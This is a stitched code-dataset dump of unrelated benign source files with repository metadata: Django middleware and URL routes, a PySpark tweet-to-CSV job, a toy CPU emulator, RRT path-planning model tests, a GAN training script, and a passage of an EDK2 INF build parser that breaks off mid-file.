self.rng_key = jax.random.PRNGKey(0)
self.trace = None
def __repr__(self):
return self.math_repr
def prior_predict(self, *args, num_samples=1000, **kwargs):
"""We should also be able to pass the data as simple args"""
return mcx.predict(self, self.model)(**kwargs)
def predict(self, *args, num_samples=1000, **kwargs):
"""We should also be able to pass the data as simple args"""
if not self.trace:
raise ValueError("""You must run the `.fit` method before being able to make predictions. Maybe you were looking for `prior_predict`?""")
return mcx.predict(self, self.model, self.trace)(**kwargs)
@abstractmethod
def fit(self):
pass
def _fit(self, kernel, num_samples=1000, accelerate=True, **observations):
"""While it impossible to provide a universal fitting mechanism, some
are certainly better than others.
"""
_, self.rng_key = jax.random.split(self.rng_key)
sampler = mcx.sampler(
self.rng_key,
self.model,
kernel,
**observations,
)
trace = sampler.run(1000, accelerate)
self.sampler = sampler
self.trace = trace
return trace
@abstractproperty
def model(self):
pass
@abstractproperty
def math_repr(self):
pass
@abstractproperty
def graph(self):
pass
| [
"remilouf@gmail.com"
] | remilouf@gmail.com |
2e2bdefe2b4e3ce8514dd285194ed6d9f43863bd | 74b6523512f17f4c18096b956e4c3c074b53cf4c | /myNews.py | 3170f0ec9c830c21762b973cc0dd598006213758 | [] | no_license | howie6879/getNews | f7fdbd310c0e48a8a2c74504aa27893d25354ba1 | ab5ad56c8520e60d5f568deed0081dfc127b7cd9 | refs/heads/master | 2020-05-21T23:49:40.805281 | 2017-04-02T03:51:33 | 2017-04-02T03:51:33 | 59,347,631 | 49 | 23 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | """myNews
Usage: myNews [-p] <port>
Options:
-h,--help 显示帮助菜单
-p 端口号
Example:
myNews -p 8888 设置端口号为8888
"""
from docopt import docopt
from server import main
def cli():
kwargs = docopt(__doc__)
port = kwargs['<port>']
main(port)
if __name__ == "__main__":
cli()
| [
"xiaozizayang@gmail.com"
] | xiaozizayang@gmail.com |
71039b5129c2b132a82935c0dc011e70fb6812f2 | b44bd5b2a620d9f36e5d9528326595382ce6f25a | /coffeestats/caffeine/middleware.py | 98675006101fd71c091f82dcbfec108cf125cadc | [
"MIT"
] | permissive | coffeestats/coffeestats-django | 993f8cf1ad91c698ed12441afd57c4fa481583a4 | 8982dc736261ab3cbe0f3e1d94da40bb03cd8ff3 | refs/heads/master | 2021-01-17T07:20:04.472876 | 2019-12-21T12:30:51 | 2019-12-21T12:30:51 | 19,642,292 | 6 | 1 | MIT | 2019-12-21T12:32:03 | 2014-05-10T13:39:20 | Python | UTF-8 | Python | false | false | 1,118 | py | from django.conf import settings
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils.http import urlquote_plus
class EnforceTimezoneMiddleware:
"""
Middleware to enforce that users have a time zone set.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
"""
Redirects to the time zone selection vie and passes the originally
requested URL to that view if the current user does not have a time
zone set.
:param HttpRequest request: the current request
:return: redirect or None
"""
timezone_path = reverse('select_timezone')
if (request.user.is_authenticated and
not request.user.timezone and
not request.path.startswith(settings.STATIC_URL) and
not request.path.startswith(timezone_path)):
return HttpResponseRedirect(
timezone_path + '?next=' +
urlquote_plus(request.get_full_path()))
return self.get_response(request)
| [
"jan@dittberner.info"
] | jan@dittberner.info |
f45649d716fc9a7197fa3b7b160997ad00f2bc7e | 6cb5155c882d4536b7283a623763801d9003ecec | /djproject/djproject/urls.py | df1749cf27e0ad7988ed6e84ce592d3bf6affe94 | [] | no_license | prathmeshdjango/djangoproject1 | e16f7ef9d6f87a084d258c2cb2fd2c4a0db7304f | 100ac1c5949966a51074d39cc3a019fef1d27976 | refs/heads/main | 2023-01-14T10:28:30.737383 | 2020-11-23T06:00:42 | 2020-11-23T06:00:42 | 315,217,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,015 | py | """djproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from testapp import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', views.index),
url(r'^hydjobs/', views.hydjobs1),
url(r'^blorejobs/', views.blorejobs),
url(r'^punejobs/', views.punejobs),
url(r'^chennaijobs/', views.chennaijobs),
]
| [
"prathmeshamahajan03@gmail.com"
] | prathmeshamahajan03@gmail.com |
3185803f84e25e30cfede19a48ec5f8a17fe442a | 0a4019acdfcfbcdd8077dd3a5d75327189056af7 | /spark/06GNIPDataGroupByRuleTag-Spark.py | b752a79c0f56a53e3fb51e29df5e6e8a548805a7 | [] | no_license | lin1000/TwitterPublicAPI | 0294a75c4194f14dbc1fd493a3bf977ace5a8957 | 82feede9e2ec41c912a2cf4aa8759563b676826e | refs/heads/master | 2021-01-23T04:28:33.798681 | 2019-02-21T15:03:33 | 2019-02-21T15:03:33 | 92,928,432 | 0 | 0 | null | 2017-10-08T06:29:56 | 2017-05-31T09:19:35 | Python | UTF-8 | Python | false | false | 9,698 | py | import sys
from pyspark import SparkContext, SparkConf
import glob
from os.path import basename
from os.path import splitext
import json
from pyspark.sql import SQLContext
import format.tweet as tw
def gnip_2_csv(gniptweet):
# Skip no tweet_id and handle
if not gniptweet.has_key('id'):
return
if not gniptweet.has_key('actor') and gniptweet['actor'].has_key('preferredUsername'):
return
# Twitter
tweet = tw.FIELDS()
tweet.DOCUMENT_ID = gniptweet['id']
## Use Handle name as AUTHOR_ID
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('preferredUsername'):
tweet.AUTHOR_ID = gniptweet['actor']['preferredUsername']
else:
tweet.AUTHOR_ID = ''
tweet.SOURCE_NAME = 'Twitter'
if gniptweet.has_key('link'):
tweet.URL = gniptweet['link']
else:
tweet.URL = ''
if (gniptweet.has_key('verb') and gniptweet['verb'].find('share') != -1) or (
gniptweet.has_key('verb') and gniptweet['verb'].find('post') != -1 and gniptweet.has_key(
'inReplyTo')):
tweet.IS_COMMENT = 1
else:
tweet.IS_COMMENT = 0
#gniptime = gniptweet['postedTime']
#pytime = time.strptime(gniptime, '%Y-%m-%dT%H:%M:%S.000Z')
tweet.POST_TIMESTAMP = gniptweet['postedTime']
if gniptweet.has_key('body'):
tweet.CONTENT = gniptweet['body']
else:
tweet.CONTENT = ''
if gniptweet.has_key('twitter_lang'):
tweet.LANGUAGE = gniptweet['twitter_lang']
else:
tweet.LANGUAGE = ''
if gniptweet.has_key('location') and gniptweet['location'].has_key('displayName'):
tweet.LOCATION_NAME = gniptweet['location']['displayName']
else:
tweet.LOCATION_NAME = ''
if gniptweet.has_key('location') and gniptweet['location'].has_key('twitter_country_code'):
tweet.COUNTRY_CODE = gniptweet['location']['twitter_country_code']
else:
tweet.COUNTRY_CODE = ''
if gniptweet.has_key('geo') and gniptweet['geo'].has_key('coordinates'):
tweet.GEO_COORDINATES = str(gniptweet['geo']['coordinates'][1]) + ',' + str(
gniptweet['geo']['coordinates'][0])
else:
tweet.GEO_COORDINATES = ''
if tweet.GEO_COORDINATES == '':
if gniptweet.has_key('location'):
if gniptweet['location'].has_key('geo'):
if gniptweet['location']['geo'] is not None:
if gniptweet['location']['geo'].has_key('coordinates') and gniptweet['location']['geo']['type'].find('Polygon') != -1:
xaix = (gniptweet['location']['geo']['coordinates'][0][0][0] +
gniptweet['location']['geo']['coordinates'][0][1][0] +
gniptweet['location']['geo']['coordinates'][0][2][0] +
gniptweet['location']['geo']['coordinates'][0][3][0]) / 4
yaix = (gniptweet['location']['geo']['coordinates'][0][0][1] +
gniptweet['location']['geo']['coordinates'][0][1][1] +
gniptweet['location']['geo']['coordinates'][0][2][1] +
gniptweet['location']['geo']['coordinates'][0][3][1]) / 4
tweet.GEO_COORDINATES = str(xaix) + ',' + str(yaix)
else:
tweet.GEO_COORDINATES = ''
# Author
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('id'):
tweet.AUTHOR_NAME = gniptweet['actor']['id']
else:
tweet.AUTHOR_NAME = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('preferredUsername'):
tweet.AUTHOR_ID = gniptweet['actor']['preferredUsername']
else:
tweet.AUTHOR_ID = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('displayName'):
tweet.AUTHOR_NICKNAME = gniptweet['actor']['displayName']
else:
tweet.AUTHOR_NICKNAME = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('link'):
tweet.AUTHOR_URL = gniptweet['actor']['link']
else:
tweet.AUTHOR_URL = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('image'):
tweet.AUTHOR_AVATAR_URL = gniptweet['actor']['image']
else:
tweet.AUTHOR_AVATAR_URL = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('location') and gniptweet['actor'][
'location'].has_key('displayName'):
tweet.AUTHOR_LOCATION = gniptweet['actor']['location']['displayName']
else:
tweet.AUTHOR_LOCATION = ''
tweet.SOURCE_NAME = 'Twitter'
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('friendsCount'):
tweet.FRIENDS_COUNT = gniptweet['actor']['friendsCount']
else:
tweet.FRIENDS_COUNT = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('followersCount'):
tweet.FOLLOWERS_COUNT = gniptweet['actor']['followersCount']
else:
tweet.FOLLOWERS_COUNT = ''
if gniptweet['gnip'].has_key('klout_score'):
tweet.KLOUT_SCORE = str(gniptweet['gnip']['klout_score'])
else:
tweet.KLOUT_SCORE = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('favoritesCount'):
tweet.FAVORITES_COUNT = gniptweet['actor']['favoritesCount']
else:
tweet.FAVORITES_COUNT = 0
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('listedCount'):
tweet.LISTED_COUNT = gniptweet['actor']['listedCount']
else:
tweet.LISTED_COUNT = 0
if gniptweet.has_key('inReplyTo') and gniptweet['inReplyTo'].has_key('link'):
tweet.IN_REPLAT_TO_URL = gniptweet['inReplyTo']['link']
else:
tweet.IN_REPLAT_TO_URL = ''
if gniptweet.has_key('twitter_entities') and gniptweet['twitter_entities'].has_key('hashtags'):
cnt = 0
for tag in gniptweet['twitter_entities']['hashtags']:
tweet.HASH_TAGS.append(tag['text'])
cnt = cnt + 1
if cnt >= 10:
break
if gniptweet.has_key('twitter_entities') and gniptweet['twitter_entities'].has_key('urls'):
cnt = 0
for url in gniptweet['twitter_entities']['urls']:
tweet.URL_MENTIONS.append(url['url'])
cnt = cnt + 1
if cnt >= 10:
break
if gniptweet.has_key('twitter_entities') and gniptweet['twitter_entities'].has_key('user_mentions'):
cnt = 0
for mention in gniptweet['twitter_entities']['user_mentions']:
tweet.USER_MENTIONS.append(mention['screen_name'])
cnt = cnt + 1
if cnt >= 10:
break
return tweet.toCSVLine()
def test_if_dict_contain_rule_tag(mydict,rule_tag):
#print "comparing mydict(%s) with %s" % (len(mydict),rule_tag)
for tagline in mydict:
if("tag" in tagline and tagline['tag']==rule_tag):
#print "TAG FOUND"
return True
#print "TAG MISS"
return False
def group_by_rule_tag(rule_tag_list=[]):
datafiles = "../python/05GNIPData/*.json.gz"
# datafiles = "../python/05GNIPData/20160601-20170601_avgg5v796n_2016_06_01_00_*_activities.json.gz"
filenames = glob.glob(datafiles)
outputfilepath = "../spark/06GNIPDataGroupByRuleTag/"
dataRDD = sc.textFile(datafiles).map(lambda x : json.loads(x))
print "Loaded %s json records" % (dataRDD.count())
#dataRDD.persist()
for rule_tag in rule_tag_list:
#print dataRDD.map(lambda d: d.keys()).collect()
#print dataRDD.flatMap(lambda d: d.keys()).distinct().collect()
#print dataRDD.map(lambda tweet: (len(tweet.keys()),1)).reduceByKey(lambda x, y: x + y).collect()
#print dataRDD.filter(lambda t: "body" in t).map(lambda t : (t['gnip']['matching_rules'][0]['tag'],t)).groupByKey().saveAsTextFile(outputfilepath)
#try to groupBy or groupByKey
#groupByRuleTag = dataRDD.filter(lambda t: "body" in t).map(lambda t : (t['gnip']['matching_rules'][0]['tag'],t)).groupBy(lambda (k,vs): k,1)
groupByRuleTag = dataRDD.filter(lambda t: "body" in t).filter(lambda t: test_if_dict_contain_rule_tag(t['gnip']['matching_rules'],rule_tag)).map(lambda t: gnip_2_csv(t))
#save filtered result into files
groupByRuleTag.saveAsTextFile(outputfilepath + "/" + rule_tag)
#load as sparkSQL dataframe
#df = sqlContext.read.json(groupByRuleTag)
#df.registerTempTable(rule_tag)
#df_result = sqlContext.sql("SELECT _corrupt_record as spark_tweet FROM "+rule_tag)
#df_result.write.json(rule_tag+".json")
#groupByRuleTag_list = [ t for t in groupByRuleTag.collect()]
#for tag in groupByRuleTag_list:
#print "%s %s" % (tag[0],len(tag[1]))
#print dataRDD.filter(lambda t: "body" in t).map(lambda t : (t['gnip']['matching_rules'][0]['tag'],t)).groupByKey(3).map(lambda (k,vs): (k,len(vs))).saveAsTextFile(outputfilepath)
#dataRDD.persist()
#print dataRDD.count()
#print dataRDD.take(1)
#print dataRDD.map(lambda tweet: type(tweet)).collect()
#dataRDD.take(10)
#group_by_rule_tags_json = {u'group_by_rule_tags': [] }
# for filename in filenames:
# base = basename(filename)
# (fname,extname) = splitext(base)
# print "Preparing to load %s" % (base)
# dataRDD = sc.textFile(datafiles)
# print dataRDD.take(1)
#numA = dataRDD.filter(lambda s: 'tony' in s).count()
#numB = dataRDD.filter(lambda s: 'mary' in s).count()
#print "Lines with tony : %s , lines with mary: %s" % (numA,numB)
if __name__=='__main__':
conf = SparkConf().setAppName("Read entire json activities app by pyspark")
sc = SparkContext(conf=conf)
sqlContext = SQLContext(sc)
group_by_rule_tag(['modelpress','kenichiromogi','HikaruIjuin'])
sc.stop()
| [
"lin1000@gmail.com"
] | lin1000@gmail.com |
cec45328cdf57a5676db59114e7172432441f9d4 | 718260336685a52961108a305ad81a85f05402d6 | /GP/simple_machine_01.py | 9d7d66135a4efcd6a39fa78665ad9e2d13f565bf | [] | no_license | gmgower/https-github.com-LambdaSchool-Computer-Architecture | 4aae4259602498cfdb28d1e408bb85d263038844 | 5c122b7e19451dff2efdb49fad029a3cb7d7ec62 | refs/heads/master | 2022-12-28T08:30:25.786494 | 2020-10-09T03:52:45 | 2020-10-09T03:52:45 | 299,478,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,355 | py | import sys
PRINT_TIM = 0b00000001
HALT = 0b00000010
PRINT_NUM = 0b01000011
SAVE = 0b10000100 # LDI
PRINT_REGISTER = 0b01000101
ADD = 0b10000110
memory = [0] * 256
def load_memory():
if (len(sys.argv)) != 2:
print("remember to pass the second file name")
print("usage: python3 fileio.py <second_file_name.py>")
sys.exit()
address = 0
try:
with open(sys.argv[1]) as f:
for line in f:
# parse the file to isolate the binary opcodes
possible_number = line[:line.find('#')]
if possible_number == '':
continue # skip to next iteration of loop
instruction = int(possible_number, 2)
memory[address] = instruction
except FileNotFoundError:
print(f'Error from {sys.argv[0]}: {sys.argv[1]} not found')
sys.exit()
load_memory()
# cabinets in your shop: registers
# storage unit: cache
# warehouse outside town: RAM
# registers
# physically located on CPU, treat as variables
# R0-R7
registers = [0] * 8
# cpu should now step through memory and take actions based on commands it finds
# a data-driven machine
# program counter, a pointer
pc = 0
running = True
while running:
command = memory[pc]
num_args = command >> 6
if command == PRINT_TIM:
print("tim!")
elif command == PRINT_NUM:
number = memory[pc + 1]
print(number)
elif command == SAVE:
# get out the arguments
# pc+1 is reg idx, pc+2 value
reg_idx = memory[pc + 1]
value = memory[pc + 2]
# put the value into the correct register
registers[reg_idx] = value
elif command == PRINT_REGISTER:
# get out the argument
reg_idx = memory[pc + 1]
# the argument is a pointer to a register
value = registers[reg_idx]
print(value)
elif command == ADD:
# pull out the arguments
reg_idx_1 = memory[pc + 1]
reg_idx_2 = memory[pc + 2]
# add regs together
registers[reg_idx_1] = registers[reg_idx_1] + registers[reg_idx_2]
elif command == HALT:
running = False
else:
print('unknown command!')
running = False
pc += 1 + num_args | [
"gmgower@gmail.com"
] | gmgower@gmail.com |
e8effc6917de42d5c0e65db39dda12ac46e9f5b9 | 6f4e4b647df1bca98ce298e99d3e9adf3379914f | /modeltest.py | 11cabcdf7ef190f6194ed11ee7a2060465e8190e | [] | no_license | ShiqiSun/RRTNN | 358680f25f8e1981f84ba088c6b3d31556a93b31 | f0120a83851eaaa55375d153d904723c964cc371 | refs/heads/master | 2022-12-01T10:01:02.364447 | 2020-08-09T01:24:26 | 2020-08-09T01:24:26 | 281,417,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,083 | py | from keras.models import load_model
import numpy as np
from RRT.src.utilities.plotting import Plot
from RRT.src.search_space.search_space import SearchSpace
from region import *
def testmodel_fromzero(path, xinit, yinit):
x_up_bound = 60 # 120
x_low_bound = 0
y_up_bound = 60 # 120
y_low_bound = 0
model = load_model(path)
x_init = (xinit, yinit)
x_goal = (30, 60) # goal location(100, 100)
X_dimensions = np.array([(x_low_bound, x_up_bound), (y_low_bound, y_up_bound)]) # dimension of serach space
Obstacles = np.array([(0, 0, 20, 20), (0, 40, 20, 60),
(40, 0, 60, 20), (40, 40, 60, 60)]) # obstacles
X = SearchSpace(X_dimensions, Obstacles)
x_position = np.zeros((1, 2))
x_position[0][0] = xinit
x_position[0][1] = yinit
path = list()
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
for i in range(100):
# print(x_position)
y_pred = model.predict(x_position)
print(y_pred)
# breakpoint()
x_position = y_pred
position = [x_position[0][0], x_position[0][1]]
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
if x_position[0][0] > x_up_bound or x_position[0][1] > y_up_bound or x_position[0][0] < x_low_bound or x_position[0][1] < y_low_bound:
break
print("Final position is", x_position)
plot = Plot("rrt_2d")
plot.plot_path(X, path)
plot.plot_obstacles(X, Obstacles)
plot.plot_start(X, x_init)
plot.plot_goal(X, x_goal)
plot.draw(auto_open=True)
del model
def testmodel_random(path):
model = load_model(path)
# Define size of environment
x_up_bound = 120
x_low_bound = 0
y_up_bound = 120
y_low_bound = 0
x_goal = (100, 100)
X_dimensions = np.array([(0, 120), (0, 120)]) # dimension of serach space
Obstacles = np.array([(20, 20, 40, 40), (20, 60, 40, 80),
(60, 20, 80, 40), (60, 60, 80, 80)]) # obstacles
X = SearchSpace(X_dimensions, Obstacles)
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
while is_Obstacle(x_init, Obstacles):
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
x_position = np.zeros((1, 2))
x_position[0][0] = x_init[0]
x_position[0][1] = x_init[1]
path = list()
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
while True:
y_pred = model.predict(x_position)
print(y_pred)
x_position = y_pred
position = [x_position[0][0], x_position[0][1]]
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
if testregion(position, x_goal, 3):
break
if x_position[0][0] > 120 or x_position[0][1] > 120 or x_position[0][0] < 0 or x_position[0][1] < 0:
break
print("Final position is", x_position)
plot = Plot("rrt_2d")
plot.plot_path(X, path)
plot.plot_obstacles(X, Obstacles)
plot.plot_start(X, x_init)
plot.plot_goal(X, x_goal)
plot.draw(auto_open=True)
del model
def testmodel_random_nolimit(path):
model = load_model(path)
# Define size of environment
x_up_bound = 60 # 120
x_low_bound = 0
y_up_bound = 60 #120
y_low_bound = 0
# x_goal = (100, 100)
#
# X_dimensions = np.array([(0, 120), (0, 120)]) # dimension of serach space
# Obstacles = np.array([(20, 20, 40, 40), (20, 60, 40, 80),
# (60, 20, 80, 40), (60, 60, 80, 80)]) # obstacles
x_goal = (30, 60) # goal location(100, 100)
X_dimensions = np.array([(x_low_bound, x_up_bound), (y_low_bound, y_up_bound)]) # dimension of serach space
Obstacles = np.array([(0, 0, 20, 20), (0, 40, 20, 60),
(40, 0, 60, 20), (40, 40, 60, 60)]) # obstacles
X = SearchSpace(X_dimensions, Obstacles)
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
while is_Obstacle(x_init, Obstacles):
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
x_position = np.zeros((1, 2))
x_position[0][0] = x_init[0]
x_position[0][1] = x_init[1]
path = list()
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
for i in range(100):
y_pred = model.predict(x_position)
print(y_pred)
x_position = y_pred
position = [x_position[0][0], x_position[0][1]]
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
if x_position[0][0] > x_up_bound or x_position[0][1] > y_up_bound or x_position[0][0] < x_low_bound or x_position[0][1] < y_low_bound:
break
print("Final position is", x_position)
plot = Plot("rrt_2d")
plot.plot_path(X, path)
plot.plot_obstacles(X, Obstacles)
plot.plot_start(X, x_init)
plot.plot_goal(X, x_goal)
plot.draw(auto_open=True)
del model
| [
"shiqi.sun@duke.edu"
] | shiqi.sun@duke.edu |
9fdb4d019b5ec120c7bd4c3cbe140bf7023e5911 | e32801b4debf07340b98255eb35e2c41ba2d2bb5 | /scripts/addons_extern/animation_nodes_master/nodes/spline/spline_info.py | 83687abbd74969916131dea3e58cb5731c0728d3 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | JuhaW/blenderpython | 8c7130484690339c06f85b740c2f9e595b34a9dc | ee7b3a9f9d8cfbea32258e7ff05c3cb485a8879a | refs/heads/master | 2021-07-21T23:59:42.476215 | 2017-10-25T08:42:04 | 2017-10-25T08:42:04 | 108,861,751 | 1 | 0 | null | 2017-10-30T14:25:14 | 2017-10-30T14:25:14 | null | UTF-8 | Python | false | false | 505 | py | import bpy
from ... base_types.node import AnimationNode
class SplineInfoNode(bpy.types.Node, AnimationNode):
bl_idname = "an_SplineInfoNode"
bl_label = "Spline Info"
def create(self):
self.newInput("Spline", "Spline", "spline", defaultDrawType = "PROPERTY_ONLY")
self.newOutput("Vector List", "Points", "points")
self.newOutput("Boolean", "Cyclic", "cyclic")
def execute(self, spline):
spline.update()
return spline.getPoints(), spline.isCyclic
| [
"meta.androcto1@gmail.com"
] | meta.androcto1@gmail.com |
81e0e271bc79314d2a63e264a4fb2ebf926e3631 | 7ae6e33e978e214002f94aa9fa473783bdb1a7d7 | /distgan/distgan.py | 40cd76b250945a753ab1dadb00d68349d796407d | [] | no_license | archmaester/gan-zoo | c7e63c128f1e83e6d3181f40963d7c296becf86e | 36eef93dffe949219d9ca782c765ca7c6b4c0fec | refs/heads/master | 2020-04-07T21:47:20.284235 | 2018-12-26T06:35:08 | 2018-12-26T06:35:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,309 | py | import tensorflow as tf
from data_loader.data_utils_sine import Data
from models.model_distgan_sine import Model
from trainers.trainer import Trainer
from evaluate.evaluator import Evaluator
from settings.config_sine import load_settings_from_file
from utils.dirs import create_dirs
from utils.logger import Logger
from utils.plot_sine import Plot
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
session_conf = tf.ConfigProto(allow_soft_placement = True, log_device_placement = False)
session_conf.gpu_options.allow_growth = True
def main():
# PROLOG
settings = load_settings_from_file()
# Create directories
create_dirs(settings['dir_root'])
# Create Tensorflow Session
sess = tf.Session(config = session_conf)
# Create the data generator
data = Data(settings)
# Create Model
model = Model(settings)
# Create tensorflow Logging
logger = Logger(sess, settings)
#Creating plots
plot = Plot(sess, settings)
sess.run(tf.global_variables_initializer())
# Create trainer object
trainer = Trainer(sess, model, data, settings, logger, plot)
# Train the model
trainer.train_epoch()
#Evaluate the model
trainer.evaluate()
if __name__ == '__main__':
main() | [
"keswanimonish@yahoo.com"
] | keswanimonish@yahoo.com |
78d77000f9044e59818d10fa6c44a41334a60c95 | 419fe1725040d83075a4983986f500d75e098564 | /Sort/LargestNumber.py | 56b625f5c0cc12aad379bb9a132b44c6fcb0f9ec | [] | no_license | snanoh/Python-Algorithm-Study | 66a2f258b0b215f4047574d29780c54fb2b34643 | c529088d32a2692f38071ed0d18c198543b6b9de | refs/heads/main | 2023-03-22T03:27:15.914974 | 2021-02-18T12:41:16 | 2021-02-18T12:41:16 | 319,297,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | from typing import List
def to_swap(n1: int, n2: int) -> bool:
return str(n1) + str(n2) < str(n2) + str(n1)
# 삽입 정렬 구현
def largestNumber( nums: List[int]) -> str:
i = 1
while i < len(nums):
j = i
while j > 0 and to_swap(nums[j - 1], nums[j]):
nums[j], nums[j - 1] = nums[j - 1], nums[j]
j -= 1
i += 1
return str(int(''.join(map(str, nums))))
nums = [3, 30, 34, 5, 9]
print(largestNumber(nums))
| [
"njs1324@gmail.com"
] | njs1324@gmail.com |
61c6ccd66c69dcc38f504e14f4d66366d9bc51e6 | b8f4b32171bba9e60a101f5a605e084c9aa974fd | /BaseTools/Source/Python/Workspace/InfBuildData.py | 7675b0ea00ebd6a5fc3e823c965e32066f66f650 | [
"BSD-3-Clause",
"BSD-2-Clause-Patent"
] | permissive | jinjhuli/slimbootloader | 3137ab83073865b247f69b09a628f8b39b4c05ee | cfba21067cf4dce659b508833d8c886967081375 | refs/heads/master | 2023-07-11T12:59:51.336343 | 2020-09-11T00:16:48 | 2020-09-11T00:24:52 | 149,729,121 | 1 | 0 | BSD-2-Clause | 2018-09-21T07:49:42 | 2018-09-21T07:49:42 | null | UTF-8 | Python | false | false | 48,567 | py | ## @file
# This file is used to create a database used by build tool
#
# Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.<BR>
# (C) Copyright 2016 Hewlett Packard Enterprise Development LP<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
from __future__ import absolute_import
from Common.DataType import *
from Common.Misc import *
from Common.caching import cached_property, cached_class_function
from types import *
from .MetaFileParser import *
from collections import OrderedDict
from Workspace.BuildClassObject import ModuleBuildClassObject, LibraryClassObject, PcdClassObject
## Get Protocol value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def _ProtocolValue(CName, PackageList, Inffile = None):
for P in PackageList:
ProtocolKeys = list(P.Protocols.keys())
if Inffile and P._PrivateProtocols:
if not Inffile.startswith(P.MetaFile.Dir):
ProtocolKeys = [x for x in P.Protocols if x not in P._PrivateProtocols]
if CName in ProtocolKeys:
return P.Protocols[CName]
return None
## Get PPI value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def _PpiValue(CName, PackageList, Inffile = None):
for P in PackageList:
PpiKeys = list(P.Ppis.keys())
if Inffile and P._PrivatePpis:
if not Inffile.startswith(P.MetaFile.Dir):
PpiKeys = [x for x in P.Ppis if x not in P._PrivatePpis]
if CName in PpiKeys:
return P.Ppis[CName]
return None
## Module build information from INF file
#
# This class is used to retrieve information stored in database and convert them
# into ModuleBuildClassObject form for easier use for AutoGen.
#
class InfBuildData(ModuleBuildClassObject):
# dict used to convert PCD type in database to string used by build tool
_PCD_TYPE_STRING_ = {
MODEL_PCD_FIXED_AT_BUILD : TAB_PCDS_FIXED_AT_BUILD,
MODEL_PCD_PATCHABLE_IN_MODULE : TAB_PCDS_PATCHABLE_IN_MODULE,
MODEL_PCD_FEATURE_FLAG : TAB_PCDS_FEATURE_FLAG,
MODEL_PCD_DYNAMIC : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_DEFAULT : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_HII : TAB_PCDS_DYNAMIC_HII,
MODEL_PCD_DYNAMIC_VPD : TAB_PCDS_DYNAMIC_VPD,
MODEL_PCD_DYNAMIC_EX : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_DEFAULT : TAB_PCDS_DYNAMIC_EX,
MODEL_PCD_DYNAMIC_EX_HII : TAB_PCDS_DYNAMIC_EX_HII,
MODEL_PCD_DYNAMIC_EX_VPD : TAB_PCDS_DYNAMIC_EX_VPD,
}
# dict used to convert part of [Defines] to members of InfBuildData directly
_PROPERTY_ = {
#
# Required Fields
#
TAB_INF_DEFINES_BASE_NAME : "_BaseName",
TAB_INF_DEFINES_FILE_GUID : "_Guid",
TAB_INF_DEFINES_MODULE_TYPE : "_ModuleType",
#
# Optional Fields
#
# TAB_INF_DEFINES_INF_VERSION : "_AutoGenVersion",
TAB_INF_DEFINES_COMPONENT_TYPE : "_ComponentType",
TAB_INF_DEFINES_MAKEFILE_NAME : "_MakefileName",
# TAB_INF_DEFINES_CUSTOM_MAKEFILE : "_CustomMakefile",
TAB_INF_DEFINES_DPX_SOURCE :"_DxsFile",
TAB_INF_DEFINES_VERSION_NUMBER : "_Version",
TAB_INF_DEFINES_VERSION_STRING : "_Version",
TAB_INF_DEFINES_VERSION : "_Version",
TAB_INF_DEFINES_PCD_IS_DRIVER : "_PcdIsDriver",
TAB_INF_DEFINES_SHADOW : "_Shadow"
}
# regular expression for converting XXX_FLAGS in [nmake] section to new type
_NMAKE_FLAG_PATTERN_ = re.compile("(?:EBC_)?([A-Z]+)_(?:STD_|PROJ_|ARCH_)?FLAGS(?:_DLL|_ASL|_EXE)?", re.UNICODE)
# dict used to convert old tool name used in [nmake] section to new ones
_TOOL_CODE_ = {
"C" : "CC",
BINARY_FILE_TYPE_LIB : "SLINK",
